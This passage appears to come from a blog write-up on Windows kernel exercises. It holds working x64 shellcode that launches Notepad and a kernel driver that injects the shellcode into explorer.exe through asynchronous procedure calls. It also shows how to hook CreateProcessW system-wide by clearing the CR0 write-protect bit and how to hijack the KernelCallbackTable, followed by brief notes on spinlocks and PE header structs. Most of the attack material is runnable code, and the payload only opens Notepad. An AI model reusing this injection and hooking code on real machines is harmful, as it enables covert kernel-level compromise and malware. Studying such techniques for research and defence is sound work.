 0x48, 0x81, 0xEC, 0x68, 0x01, 0x00, 0x00, 0xC6, 0x84, 0x24, 0x38, 0x01, 0x00, 0x00, 0x6E, 0xC6,  
 0x84, 0x24, 0x39, 0x01, 0x00, 0x00, 0x6F, 0xC6, 0x84, 0x24, 0x3A, 0x01, 0x00, 0x00, 0x74, 0xC6,  
 0x84, 0x24, 0x3B, 0x01, 0x00, 0x00, 0x65, 0xC6, 0x84, 0x24, 0x3C, 0x01, 0x00, 0x00, 0x70, 0xC6,  
 0x84, 0x24, 0x3D, 0x01, 0x00, 0x00, 0x61, 0xC6, 0x84, 0x24, 0x3E, 0x01, 0x00, 0x00, 0x64, 0xC6,  
 0x84, 0x24, 0x3F, 0x01, 0x00, 0x00, 0x2E, 0xC6, 0x84, 0x24, 0x40, 0x01, 0x00, 0x00, 0x65, 0xC6,  
 0x84, 0x24, 0x41, 0x01, 0x00, 0x00, 0x78, 0xC6, 0x84, 0x24, 0x42, 0x01, 0x00, 0x00, 0x65, 0xC6,  
 0x84, 0x24, 0x43, 0x01, 0x00, 0x00, 0x00, 0xC7, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x00, 0x00,  
 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24,  
 0x50, 0x01, 0x00, 0x00, 0x48, 0x63, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x68,  
 0x73, 0x12, 0x48, 0x63, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xC6, 0x84, 0x04, 0xC0, 0x00, 0x00,  
 0x00, 0x00, 0xEB, 0xD0, 0xC7, 0x84, 0x24, 0xC0, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0xC7,  
 0x84, 0x24, 0x54, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x54,  
 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24, 0x54, 0x01, 0x00, 0x00, 0x48, 0x63, 0x84, 0x24,  
 0x54, 0x01, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x18, 0x73, 0x12, 0x48, 0x63, 0x84, 0x24, 0x54, 0x01,  
 0x00, 0x00, 0xC6, 0x84, 0x04, 0x80, 0x00, 0x00, 0x00, 0x00, 0xEB, 0xD0, 0x65, 0x48, 0x8B, 0x04,  
 0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x89, 0x84, 0x24, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x84,  
 0x24, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x18, 0x48, 0x89, 0x84, 0x24, 0x48, 0x01, 0x00,  
 0x00, 0x48, 0x8B, 0x84, 0x24, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x10, 0x48, 0x89, 0x84,  
 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40,  
 0x50, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x28, 0x48,  
 0x89, 0x44, 0x24, 0x50, 0x33, 0xC0, 0x83, 0xF8, 0x01, 0x74, 0x74, 0x48, 0x8B, 0x44, 0x24, 0x50,  
 0x48, 0xB9, 0x6B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x48, 0x39, 0x08, 0x75, 0x2C, 0x48,  
 0x8B, 0x44, 0x24, 0x50, 0x48, 0xB9, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x48, 0x39,  
 0x48, 0x08, 0x75, 0x17, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, 0xB9, 0x2E, 0x00, 0x64, 0x00, 0x6C,  
 0x00, 0x6C, 0x00, 0x48, 0x39, 0x48, 0x10, 0x75, 0x02, 0xEB, 0x34, 0x48, 0x8B, 0x84, 0x24, 0x98,  
 0x00, 0x00, 0x00, 0x48, 0x8B, 0x00, 0x48, 0x89, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B,  
 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x50, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48,  
 0x8B, 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x28, 0x48, 0x89, 0x44, 0x24, 0x50, 0xEB, 0x85, 0x48,  
 0x8B, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x30, 0x48, 0x89, 0x44, 0x24, 0x68,  
 0x48, 0x8B, 0x44, 0x24, 0x68, 0x48, 0x89, 0x84, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84,  
 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x63, 0x40, 0x3C, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03,  
 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x78, 0x48, 0x8B, 0x44, 0x24, 0x78, 0x8B, 0x80,  
 0x88, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48,  
 0x89, 0x44, 0x24, 0x70, 0x48, 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x20, 0x48, 0x8B, 0x4C, 0x24,  
 0x68, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x48,  
 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x1C, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8, 0x48,  
 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x60, 0xC7, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00, 0x00, 0x00,  
 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24,  
 0x58, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x18, 0x39, 0x84, 0x24, 0x58,  
 0x01, 0x00, 0x00, 0x0F, 0x83, 0x86, 0x00, 0x00, 0x00, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00,  
 0x48, 0x8B, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x8B, 0x04, 0x81, 0x48, 0x8B, 0x4C, 0x24, 0x68,  
 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0x8B,  
 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0xB9, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72,  
 0x48, 0x39, 0x08, 0x75, 0x45, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x81, 0x78, 0x08,  
 0x6F, 0x63, 0x65, 0x73, 0x75, 0x34, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x0F, 0xB7,  
 0x40, 0x0C, 0x3D, 0x73, 0x41, 0x00, 0x00, 0x75, 0x21, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00,  
 0x48, 0x8B, 0x4C, 0x24, 0x60, 0x8B, 0x04, 0x81, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8,  
 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x58, 0xEB, 0x05, 0xE9, 0x55, 0xFF, 0xFF, 0xFF, 0x48,  
 0x8D, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48, 0x8D, 0x84, 0x24,  
 0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0xC7, 0x44, 0x24, 0x38, 0x00, 0x00,  
 0x00, 0x00, 0x48, 0xC7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x28, 0x00,  
 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x45, 0x33,  
 0xC0, 0x48, 0x8D, 0x94, 0x24, 0x38, 0x01, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x54, 0x24, 0x58, 0x33,  
 0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xC3  
 };  
   
 typedef enum _KAPC_ENVIRONMENT  
 {  
      OriginalApcEnvironment,  
      AttachedApcEnvironment,  
      CurrentApcEnvironment,  
      InsertApcEnvironment  
 } KAPC_ENVIRONMENT, *PKAPC_ENVIRONMENT;  
   
 VOID KernelRoutine(struct _KAPC *Apc,   
      PKNORMAL_ROUTINE *NormalRoutine,   
      PVOID *NormalContext,   
      PVOID *SystemArgument1,   
      PVOID *SystemArgument2 )   
 {  
      DbgPrint("APC kernel routine\n");  
      ExFreePool(Apc);  
 }  
   
 VOID MyUnload(PDRIVER_OBJECT DriverObject)  
 {  
      DbgPrint("Unload routine\n");  
 }  
   
 NTSTATUS  
 DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)  
 {  
      PEPROCESS p_proc;  
      LIST_ENTRY *lentry;  
      LIST_ENTRY *le;  
      char * pImgFNam;  
      HANDLE pid;  
      BOOLEAN check = FALSE;  
      HANDLE ProcHandle = 0;  
      OBJECT_ATTRIBUTES ObjAttr;  
      SIZE_T region_size = 4096;  
      ULONG zero_bits = 0;  
      UNICODE_STRING apiName;  
      UCHAR *baseaddr = 0;  
      ULONG bw;  
      NTSTATUS status_code;  
      CLIENT_ID client_id;  
      PETHREAD ethreads;  
      KAPC_STATE apc_state;  
      VOID (*PKeInitializeApc) (PRKAPC Apc, PKTHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine OPTIONAL, PKNORMAL_ROUTINE NormalRoutine OPTIONAL, KPROCESSOR_MODE ApcMode, PVOID NormalContext);  
      BOOLEAN (*PKeInsertQueueApc) (PKAPC Apc, PVOID SystemArgument1, PVOID SystemArgument2, UCHAR mode);   
      struct _KAPC *pApc;  
   
      DriverObject->DriverUnload = &MyUnload;  
      p_proc = PsGetCurrentProcess();  
      lentry = (LIST_ENTRY *) ( ((unsigned char*)p_proc) + 0x188 ); // ActiveProcessLinks : _LIST_ENTRY  
   
      for(le = lentry; le->Flink != lentry; le = le->Flink)  
      {  
           p_proc = (PEPROCESS) ( ((unsigned char*)le) - 0x188 );  
           pImgFNam = (char *)( ((unsigned char*) p_proc) + 0x2e0 );  
           if(strncmp(pImgFNam, "explorer.exe", sizeof("explorer.exe")) == 0)   
           {  
                check = TRUE;  
                break;  
           }  
      }  
   
      if(!check)  
      {  
           return STATUS_UNSUCCESSFUL;  
      }  
   
      pid = PsGetProcessId(p_proc);  
   
      le = (LIST_ENTRY*) ( ((unsigned char *)p_proc) + 0x30); // ThreadListHead  
      ethreads = (PETHREAD) ( ((unsigned char*)(le->Flink)) - 0x2f8);  
   
      client_id.UniqueProcess = pid;  
      client_id.UniqueThread = PsGetThreadId(ethreads);  
   
      ObjAttr.Length = sizeof (OBJECT_ATTRIBUTES);  
      ObjAttr.RootDirectory = NULL;  
      ObjAttr.Attributes = OBJ_KERNEL_HANDLE;  
      ObjAttr.ObjectName = NULL;  
      ObjAttr.SecurityDescriptor = NULL;  
      ObjAttr.SecurityQualityOfService = NULL;  
   
      status_code = ZwOpenProcess(&ProcHandle, GENERIC_ALL, &ObjAttr, &client_id);  
      if(status_code != STATUS_SUCCESS)  
      {  
           return STATUS_UNSUCCESSFUL;  
      }  
   
      status_code = ZwAllocateVirtualMemory(ProcHandle, &baseaddr, (ULONG_PTR)&zero_bits, &region_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
      if(status_code != STATUS_SUCCESS)  
      {  
           ZwClose(ProcHandle);  
           return STATUS_UNSUCCESSFUL;  
      }  
        
      KeStackAttachProcess(p_proc, &apc_state);  
      memcpy(baseaddr, buffer, sizeof(buffer));  
      KeUnstackDetachProcess(&apc_state);  
   
      RtlInitUnicodeString(&apiName, L"KeInitializeApc");  
      PKeInitializeApc = MmGetSystemRoutineAddress(&apiName);   
   
      RtlInitUnicodeString(&apiName, L"KeInsertQueueApc");  
      PKeInsertQueueApc = MmGetSystemRoutineAddress(&apiName);   
        
      pApc = ExAllocatePool(NonPagedPool, sizeof(struct _KAPC));  
      PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, (PKNORMAL_ROUTINE)baseaddr, UserMode, NULL);  
        
      if(!PKeInsertQueueApc(pApc, 0, 0, 0))  
      {  
           return STATUS_UNSUCCESSFUL;  
      }  
   
      ZwClose(ProcHandle);  
      return STATUS_SUCCESS;  
 }  

The driver begins by walking the ActiveProcessLinks from the EPROCESS structure in order to locate the EPROCESS corresponding to Explorer.exe (the target process). The code then retrieves the ThreadListHead from this EPROCESS, and takes note of the first ETHREAD of the list (it is not really important which one). Having done that, PsGetProcessId and PsGetThreadId are called to retrieve the CID of the target process/thread. The driver proceeds by allocating an executable area of memory inside the process via ZwOpenProcess/ZwAllocateVirtualMemory, where it then copies the shellcode bytes. To perform the copy, the driver needs to switch to the Explorer process context via KeStackAttachProcess/KeUnstackDetachProcess.
Finally, an APC is initialized by calling KeInitializeApc and passing to it the pointer to the allocated shellcode as the normal routine. This Apc is finally queued to the target thread belonging to Explorer via KeInsertQueueApc. To be precise, during the initialization, a kernel routine is required by the OS as well, but since we don't really need it, I specified a dummy one that simply deinitializes the reserved memory for the KAPC structure.
At this point, whenever the target thread is scheduled for execution, the APC is going to be run and the usermode shellcode will start a new process. It goes without saying that it is important to choose a thread that is actually in an alertable state: some processes may have threads that are asleep or stuck in a wait, and if an APC is queued to them, it may never have a chance to be executed. In my case I picked the first thread of the Explorer process for a commodity: I noticed that this thread awakens when you right click on the icon of a folder on the desktop, thus it is very handy because it allowed me to trigger the APC manually whenever I want.

Method 2
As an alternative, I decided to hijack the execution flow of a process towards my shellcode harnessing kernelmode APCs. The idea is to patch an API that gets called quite often: the patch installs a jump to the shellcode in the entry point of the API, which, in turn, executes Notepad and calls the original API.

The code of the DriverEntry is almost the same as the one from Method 1, the only difference is that this time the scheduled APC is kernelmode and not usermode. The different lines of code are the following two:
      PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, NULL, KernelMode, NULL);  
      if(!PKeInsertQueueApc(pApc, baseaddr, p_proc, 0))  

The first one specifies that this is a kernelmode APC, while the second one passes two parameters to the kernel routine. These parameters are the pointer to the usermode shellcode and the pointer to the EPROCESS related to Explorer.
The kernelmode APC is still targeting Explorer.exe like before. Similarly to the shellcode, it retrieves and walks the list of LDR_DATA_TABLE_ENTRY structures to locate the imagebase of kernel32.dll. Once found, the routine retrieves the address of the CreateProcessW API from the export table, and proceeds by patching it in order to jump to the shellcode. I chose CreateProcessW just because it is easy to trigger it on command (e.g. by running a process from explorer's GUI), but the method applies equally to any other API.

The shellcode has also been slightly modified in that I added the following bytes:
 ...  
 0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,  // last bytes of previous shellcode, padded with nops  
 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // myflag dq 0  
 0x65, 0x48, 0xa1, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  // mov rax,qword ptr gs:[40h] TEB.CliendId.UniqueProcess << entry  
 0x3d, 0x00, 0x00, 0x00, 0x00,                    // cmp   eax, <pid> (<pid> will be patched with the PID of explorer.exe)  
 0x75, 0x2d,                                      // jnz   Done  
 0x53,                                            // push  rbx  
 0x48, 0xC7, 0xC0, 0x00, 0x00, 0x00, 0x00,        // mov   rax, 0  
 0x48, 0xC7, 0xC3, 0x01, 0x00, 0x00, 0x00,        // mov   rbx, 1  
 0xF0, 0x48, 0x0F, 0xB1, 0x1D, 0xce, 0xff, 0xff, 0xff,  // lock  cmpxchg cs:myflag, rbx  
 0x5B,                                            // pop   rbx  
 0x75, 0x13,                                      // jnz   Done   (shellcode is run only once)  
 // save registers used by the shellcode routine: rax, rcx, r9, r8, rdx  
 0x41, 0x50,      // push  r8  
 0x41, 0x51,      // push  r9  
 0x50,            // push  rax  
 0x51,            // push  rcx  
 0x52,            // push  rdx  
 0xE8, 0x5F, 0xFC, 0xFF, 0xFF,       // call  shellcode (beginning of shellcode)  
 0x5a,            // pop   rdx  
 0x59,            // pop   rcx  
 0x58,            // pop   rax  
 0x41, 0x59,      // pop   r9  
 0x41, 0x58,      // pop   r8  
       //Done:  
 0x48, 0x83, 0xec, 0x68,             // sub   rsp,68h  (first two instructions of CreateProcessW)  
 0x48, 0x8b, 0x84, 0x24, 0xb8, 0x00, 0x00, 0x00,     // mov   rax,qword ptr [rsp+0B8h]  
 0xE9, 0x00, 0x00, 0x00, 0x00        // will be patched in order to jump to the rest of the original API instructions  

The JMP in the API entry point will actually transfer the execution to the third line of this block of instructions (the one marked with "entry"). This code begins by verifying that it is being run inside the Explorer process. It does so by comparing TEB.CliendId.UniqueProcess against a Pid hardcoded in the CMP instruction (fourth line). The CMP instuction has currently a Pid of zero (notice the four bytes following the 0x3d), but these bytes will be patched by the kernelmode APC routine with the value of the Pid of the Explorer process. 
After this check, the code verifies that it has not been already run by examining the line containing "myflag dq 0". These eight bytes are a quadword that simply stores 
0 initially, and which is updated to 1 after the "lock    cmpxchg cs:myflag, rbx" is run for the first time.
If both checks are satisfied, the code saves some registers on the stack, and calls the original code that I have described in the previous method. When the original shellcode returns, the code restores the registers saved earlier, executes the first two instructions of CreateProcessW and jumps to the third instruction of the original API. Again, the jump in the last line is followed by zeroed bytes, which means it jumps to the next instruction, but, as we will see later, the four bytes will be patched with the correct offset that will lead the execution flow right to the third instruction of CreateProcessW.
I had to save two instructions because when patching the API entry point I am writing a long JMP, which takes 5 bytes. The first instruction is only 4 bytes long, thus the patch ends up overwriting also the first byte of the following instruction. For this reason, the first two instructions must be preserved and executed in order to restore the original execution flow.
Note that here I hardcoded the first two instructions in the shellcode, because this is a proof-of-concept. To generalize the method it is fundamental to use a mini-disassembler to understand how many instructions are going to be overwritten during the patch (so that they can be saved in the shellcode itself). Also note that if the very first instructions are relative jumps or calls, they cannot be simply copied, but their relative offsets must be recalculated.

Finally, here is the code of the KernelRoutine:
 VOID KernelRoutine(struct _KAPC *Apc,   
      PKNORMAL_ROUTINE *NormalRoutine,   
      PVOID *NormalContext,   
      PVOID *SystemArgument1,   // address of usermode code  
      PVOID *SystemArgument2 )  // pEPROCESS  
 {  
      NTSTATUS status_code;  
      UNICODE_STRING apiName;  
      unsigned __int64 peb, p_ldr, p_LDR_DATA_TABLE_ENTRY, pShellcode;  
      unsigned __int64 image_base, image_data_directory, export_table, AddressOfNames, AddressOfFunctions;
      unsigned __int32 AddressOfNameOrdinals;  
      unsigned __int64 cr0;  
      int count = 0;  
      KIRQL apc_irql, old_irql;  
   
      // find CreateProcessW and patch it:  
   
      // find the peb from eprocess  
      peb = ((unsigned __int64 *)SystemArgument2)[0];  
      peb = ((unsigned __int64*)( ((UCHAR *)peb) + 0x338 ))[0];  
   
      // find LDR in the peb  
      p_ldr = peb + 0x18;  
      p_ldr = *((unsigned __int64 *)p_ldr);  
   
      // find kernel32 in one of the LDR  
      p_LDR_DATA_TABLE_ENTRY = *((unsigned __int64 *)(p_ldr + 0x10));  
      while(wcscmp((wchar_t *)(*(unsigned __int64 *)(p_LDR_DATA_TABLE_ENTRY + 0x60)), L"kernel32.dll") != 0)  
      {  
           p_LDR_DATA_TABLE_ENTRY = *(unsigned __int64 *)p_LDR_DATA_TABLE_ENTRY;    
      }  
      // get kernel32 imagebase  
      image_base = *(unsigned __int64 *)(p_LDR_DATA_TABLE_ENTRY + 0x30);   
   
      // parse export table to find CreateFileA and get the address  
      // image_base + offset PE_HEADER + offset _IMAGE_NT_HEADERS64._IMAGE_OPTIONAL_HEADER + offset _IMAGE_OPTIONAL_HEADER.DataDirectory[0]  
      image_data_directory = image_base + *(unsigned __int32*)(image_base +0x3c) + 0x18 + 0x70;  
      export_table = *((unsigned __int32 *)image_data_directory) + image_base;  
      AddressOfNames = *((unsigned __int32 *)(export_table + 0x20)) + image_base;  
        
      while(strncmp((char *)(*(unsigned __int32*)AddressOfNames) + image_base, "CreateProcessW", sizeof("CreateProcessW")) != 0)  
      {  
           AddressOfNames += 4;  
           count++;  
      }  
   
      AddressOfNameOrdinals = ((unsigned __int16 *)(*((unsigned __int32 *)(export_table + 0x24)) + image_base))[count];  
      AddressOfFunctions = ((unsigned __int32 *)(*((unsigned __int32 *)(export_table + 0x1c)) + image_base))[AddressOfNameOrdinals] + image_base;  
   
      // (copy the first API instructions in the stub, already done)  
   
      // patch the stub of the shellcode to make the last jmp point to the third instruction of CreateProcessW (api + 0x0C)  
      pShellcode = *(unsigned __int64 *)SystemArgument1;  
      *((unsigned __int32 *)&((char *)pShellcode)[sizeof(buffer)-4]) = (unsigned __int32)(AddressOfFunctions - (unsigned __int64)pShellcode - sizeof(buffer) + 0x0C);  
   
      // patch the opcode that compares the current PID with the PID of the target process  
      *((unsigned __int32 *)&((char *)pShellcode)[sizeof(buffer)-0x45]) = (unsigned __int32)PsGetProcessId(*((PEPROCESS*)SystemArgument2));  
   
      _disable();  
      cr0 = __readcr0();  
      __writecr0(cr0 & 0xfffeffff);  
   
      // patch the API address to jmp to the stub, this patch will be visible to all processes  
      // since removing the Write-Protect flag also disables the Copy-On-Write  
      ((char *)AddressOfFunctions)[0] = 0xe9;  
      *(unsigned __int32 *)(AddressOfFunctions + 1) = 0 - ((unsigned __int32)(AddressOfFunctions - (unsigned __int64)pShellcode - sizeof(buffer) + 0x56));  
   
      __writecr0(cr0);  
      _enable();  
   
      ExFreePool(Apc);  
 }  

As anticipated earlier, this routine hooks the CreateProcessW API by overwriting its first opcodes with a JMP to the shellcode (specifically, to its offset marked with the "Entry" comment) and by patching some of its opcodes with parameters that are available only at run-time. In particular, these parameters are: the address of the third instruction of CreateFileW and the the PID of the target process.
There is still one interesting detail that we haven't discussed yet. In order to perform the hook, the KernelRoutine disables the WriteProtect flag from the CR0 register, which allows the code to write on any present memory page, even if it is marked as read only. However, 
this has also the side effect of disabling the copy-on-write, and we will see how this is going to be addressed.
Normally, a physical memory page of code from a system DLL is shared among all processes' virtual memory. If a process decides to patch such code (e.g. an API), the OS would detect the write attempt and would allocate a dedicated physical memory page to the patching process so that it would remain localized and would not affect the other processes. However, if the WriteProtect is disabled, the OS will not react to the write attempt and thus will not allocate a dedicated physical page for the patch. This means that the patch is effectively operating on all the running processes, but not all of them have a shellcode to jump to. Therefore, to prevent crashing them, the shellcode needs to verify that the current Pid is indeed the one of Explorer.
Notein cases in which the kernel routine needs to modify sensitive areas of memory, some extra care is generally required. For example, it may be necessary to: disable the interrupts (possibly on all the CPUs by scheduling a DPC); use atomic operations; use proper synchronization. In my case, the driver was tested on a machine with a single CPU, therefore once the interrupts are disabled with _disable(), it is pretty safe to patch the code  and disable the WriteProtect without atomic operations or synchronization.

Method 3
I tried to work on a third method, which proved to be unstable and therefore cannot be used, however I think it deserves some attention. This method tries to harness the kernelmode API KeUserModeCallback in order to run code in usermode.
The OS maintains a table of usermode callback routines, which is located in usermode and is pointed by PEB.KernelCallbackTable. In particular, these callbacks can be called from kernelmode with the API KeUserModeCallback, that takes in input the index of the desired function within the table. Thus, by inserting a pointer to the shellcode inside this table, I can manage to call it from kernelmode and have it executed in usermode.

The code encompasses some changes. A first difference is at the end of the shellcode:
 ...  
 0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xcd, 0x2b, 0xc3  
which ends with an "int 2b" (0xcd 0x2b) and a "ret" (0xC3). We will see later why.

Another modification occurs in the DriverEntry, when the KAPC structure is initialized:

PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, (PKNORMAL_ROUTINE)(baseaddr + 0x35A), UserMode, NULL);
if(!PKeInsertQueueApc(pApc, baseaddr, p_proc, 0))  

The code uses again a dummy normal routine: in fact, the "baseaddr + 0x35a" parameter refers to the last byte of the shellcode (the RET). If a normal routine is not provided, the system seems to crash. 

Finally, the KernelRoutine is the one that changes significantly and does the actual job of overwriting an entry in the KernelCallbackTable :
 VOID KernelRoutine(struct _KAPC *Apc,   
      PKNORMAL_ROUTINE *NormalRoutine,   
      PVOID *NormalContext,   
      PVOID *SystemArgument1,   // address of usermode code  
      PVOID *SystemArgument2 )  // pEPROCESS  
 {  
      NTSTATUS status_code;  
      UNICODE_STRING apiName;  
      NTSTATUS (*pKeUserModeCallback)(ULONG apiNumber, void* inputBuffer, ULONG inputLength, void** outputBuffer, ULONG* outputLength);  
      unsigned __int64 peb, callback_table;  
      unsigned __int64 cr0;  
      KIRQL apc_irql, old_irql;    
   
      DbgPrint("APC kernel routine\n");  
   
      RtlInitUnicodeString(&apiName, L"KeUserModeCallback");  
      pKeUserModeCallback = MmGetSystemRoutineAddress(&apiName);   
   
      if(pKeUserModeCallback == NULL)  
      {  
           DbgPrint("Cannot find pKeUserModeCallback\n");  
           return;  
      }  
   
      DbgPrint("Usermode address: %016x \n", SystemArgument1);  
   
      // retrieve PEB address     
      peb = ((unsigned __int64 *)SystemArgument2)[0];  
      peb = ((unsigned __int64*)( ((UCHAR *)peb) + 0x338 ))[0];  
   
      // retrieve kernel callback table     
      callback_table = ((unsigned __int64*)(((UCHAR *)peb) + 0x58))[0] ;  
   
      // insert shellcode address into an empty function slot (slot n 0x76, 0x76*8 = 3b0)     
      callback_table += 0x3b0;   
   
      _disable();  
      cr0 = __readcr0();  
      __writecr0(cr0 & 0xfffeffff);  
   
      ((unsigned __int64*)callback_table)[0] = (unsigned __int64)((unsigned __int64 *)SystemArgument1)[0];  
   
      __writecr0(cr0);  
      _enable();  
   
      // call it, but first...  be careful:       
      // usermode callbacks can only run at PASSIVE, or else bugcheck IRQL_GT_ZERO_AT_SYSTEM_SERVICE  
      apc_irql = KeGetCurrentIrql();  
      KeLowerIrql(PASSIVE_LEVEL);  
    
      status_code = pKeUserModeCallback(0x76, 0, 0, 0, 0);  
   
      KeRaiseIrql(apc_irql, &old_irql);

      // ** from user mode to terminate do  xor ecx, ecx / xor edx, edx / int 2b (see shellcode) **
   
      ExFreePool(Apc);  
 }  

I chose to overwrite the table entry at index 0x76 because in my system it was always zero, but it would be preferable to have a more generic approach to find an empty entry. Once the table entry is written with the pointer to the shellcode, the driver lowers the IRQL to PASSIVE_LEVEL (it will be restored later) and issues a call to KeUserModeCallback with 0x76 as index. The routine gets executed (Notepad starts successfully) and when the usermode code has finished its task, it returns back to the kernel by issuing an int 2b. Unfortunately, when the routine ends, it crashes. I made some tests and experiments, trying to figure out if it was a problem related to the stack, but I always ended up with a crash (a usermode one, not BSOD). In the end, I did not proceed in further investigating this issue, but I believe that it should be possible to make this method stable and reliable.

4)
To protect a shared memory resource (allocated in nonpaged memory) in a SMP environment I would use a spinlock: the routines responsible to access the resource would need to acquire the spinlock in order to read or write the data. 
Before acquiring a spinlock, the system raises the IRQL at Dispatch level so that other threads cannot preempt the CPU, then it attempts to obtain the ownership of the spinlock by continuously checking its availability in a loop (that is, spinning). This mechanism ensures that only one thread from one CPU at a time is accessing the shared data and it is quite efficient, assuming that the lock is not being held for a long time.

5)
 #include <Ntifs.h>  
 #include <string.h>  
   
 #define WORD  UINT16  
 #define DWORD UINT32  
 #define BYTE  UINT8  
   
 typedef struct _IMAGE_DOS_HEADER  
 {  
      WORD e_magic;  
      WORD e_cblp;  
      WORD e_cp;  
      WORD e_crlc;  
      WORD e_cparhdr;  
      WORD e_minalloc;  
      WORD e_maxalloc;  
      WORD e_ss;  
      WORD e_sp;  
      WORD e_csum;  
      WORD e_ip;  
      WORD e_cs;  
      WORD e_lfarlc;  
      WORD e_ovno;  
      WORD e_res[4];  
      WORD e_oemid;  
      WORD e_oeminfo;  
      WORD e_res2[10];  
      LONG e_lfanew;  
 } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;  
   
 typedef struct _IMAGE_FILE_HEADER {  
      WORD Machine;  
      WORD NumberOfSections;  
      DWORD TimeDateStamp;  
      DWORD PointerToSymbolTable;  
      DWORD NumberOfSymbols;  
      WORD SizeOfOptionalHeader;  
      WORD Characteristics;  
 } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;  
            
 typedef struct _IMAGE_DATA_DIRECTORY {  
      DWORD VirtualAddress;  
      DWORD Size;  
 } IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;  
            
 #define IMAGE_NUMBEROF_DIRECTORY_ENTRIES 16  
            
  typedef struct _IMAGE_OPTIONAL_HEADER64 {  
      WORD Magic; /* 0x20b */  
      BYTE MajorLinkerVersion;  
      BYTE MinorLinkerVersion;  
      DWORD SizeOfCode;  
      DWORD SizeOfInitializedData;  
